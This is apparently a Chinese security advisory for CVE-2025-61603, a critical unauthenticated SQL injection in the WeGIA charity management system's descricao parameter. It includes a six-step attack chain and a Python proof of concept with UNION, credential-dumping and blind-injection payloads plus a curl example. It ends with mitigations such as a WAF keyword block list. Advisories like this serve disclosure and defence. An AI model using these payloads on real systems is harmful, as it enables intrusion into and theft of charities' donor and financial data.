CVE-2025-61603：WeGIA管理平台SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-61603

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WeGIA（慈善机构Web管理系统）

漏洞概述

CVE-2025-61603是WeGIA（Web Manager for Charitable Institutions）慈善机构管理系统中的一个严重SQL注入漏洞。该漏洞存在于版本3.4.12及以下，影响/controle/control.php端点中的descricao参数。由于该参数未经过充分的输入验证和参数化处理，攻击者可以通过构造恶意SQL语句注入到数据库查询中，从而执行任意SQL命令。WeGIA作为一款开源的慈善机构管理系统，被广泛应用于管理捐赠者、受益人、库存、物资等慈善业务数据，存储了大量敏感的个人信息和财务数据。该漏洞的CVSS评分为9.8，属于严重级别，攻击者无需认证即可通过网络远程利用，且不需要用户交互。一旦成功利用，攻击者可以完全控制数据库，读取、修改或删除所有数据，严重影响系统的机密性、完整性和可用性。该漏洞已在版本3.5.0中修复，修复方式为对descricao参数进行严格的输入过滤和参数化查询处理。建议所有使用WeGIA的组织尽快升级到最新版本，以避免潜在的数据泄露和系统被攻陷的风险。

技术细节

该SQL注入漏洞位于WeGIA的/controle/control.php端点，具体出现在descricao参数的处理过程中。在原始代码中，descricao参数的值被直接拼接到SQL查询语句中，而没有使用预处理语句（Prepared Statements）或参数化查询（Parameterized Queries），也没有进行充分的输入验证和转义处理。攻击者可以通过在descricao参数中注入SQL元字符（如单引号'、UNION、SELECT等）来改变原始查询的语义。例如，攻击者可以构造如下payload：' UNION SELECT username,password FROM users-- ，通过UNION查询从其他表中提取敏感数据。更危险的利用方式包括：使用堆叠查询（stacked queries）执行INSERT、UPDATE、DELETE等修改操作；利用数据库的内置函数（如LOAD_FILE、INTO OUTFILE）读写服务器文件；在MySQL等数据库中使用information_schema枚举数据库结构。由于漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），且对机密性、完整性、可用性影响均为高（C:H/I:H/A:H），因此该漏洞极易被利用，危害极大。修复方案是将所有用户输入使用参数化查询进行处理，并对特殊字符进行转义。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎Shodan、Censys或FOFA等工具搜索暴露在公网的WeGIA实例，识别目标系统的版本（<=3.4.12）以确认漏洞存在。

STEP 2

步骤2：漏洞探测

攻击者向目标/controle/control.php端点发送包含descricao参数的恶意请求，通过单引号、OR 1=1等经典SQL注入测试payload确认注入点，并判断注入类型（UNION查询、布尔盲注、时间盲注等）。

STEP 3

步骤3：数据库信息枚举

利用UNION联合查询或information_schema系统表，攻击者枚举当前数据库名、版本、所有表名和列名，获取数据库的完整结构信息。

STEP 4

步骤4：敏感数据提取

攻击者通过构造SQL查询提取users表中的管理员用户名和密码哈希、捐赠者个人信息、财务记录等敏感数据，可能导致大规模数据泄露。

STEP 5

步骤5：权限提升与持久化

攻击者提取管理员凭证后登录WeGIA管理后台，或通过SQL注入修改数据库内容植入后门账户，实现对系统的持久化控制。

STEP 6

步骤6：数据破坏或勒索

攻击者可执行DROP TABLE、DELETE等破坏性SQL语句删除数据库，或加密数据进行勒索攻击，对慈善机构造成严重的业务中断和数据损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61603 - WeGIA SQL Injection PoC
# Vulnerability: SQL Injection in /controle/control.php via 'descricao' parameter
# Affected versions: WeGIA <= 3.4.12
# Fixed in: WeGIA 3.5.0

import requests

TARGET_URL = "http://target-wegia-host/controle/control.php"

# Payload 1: Basic SQL Injection detection (error-based)
payload_error = "' OR 1=1-- -"

# Payload 2: UNION-based injection to extract database version
payload_union = "' UNION SELECT 1,version(),3,4-- -"

# Payload 3: UNION-based injection to extract table names from information_schema
payload_tables = "' UNION SELECT 1,GROUP_CONCAT(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -"

# Payload 4: Extract user credentials (example)
payload_creds = "' UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4 FROM users-- -"

# Payload 5: Boolean-based blind SQL injection
payload_blind = "' AND 1=1-- -"  # True condition
payload_blind_false = "' AND 1=2-- -"  # False condition

# Payload 6: Time-based blind SQL injection
payload_time = "' AND SLEEP(5)-- -"

def exploit_sql_injection(url, parameter_payload):
    """
    Send malicious SQL injection payload via descricao parameter
    """
    data = {
        "descricao": parameter_payload,
        # Add other required parameters based on the endpoint
    }
    try:
        response = requests.post(url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

# Example usage:
# result = exploit_sql_injection(TARGET_URL, payload_union)
# print(result)

# cURL equivalent:
# curl -X POST "http://target/controle/control.php" \
#   -d "descricao=' UNION SELECT 1,version(),3,4-- -"

print("CVE-2025-61603 PoC loaded. Configure TARGET_URL and run exploit_sql_injection().")

影响范围

WeGIA <= 3.4.12

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过Web服务器或WAF规则拦截包含SQL关键字（如UNION、SELECT、INSERT、UPDATE、DELETE、SLEEP等）的descricao参数请求；2）修改/controle/control.php端点，临时禁用该功能或限制访问IP；3）将数据库账户权限降至最低，移除DROP、FILE等高危权限；4）部署入侵检测系统（IDS）监控异常的数据库查询行为；5）尽快安排升级到3.5.0版本以获得官方修复。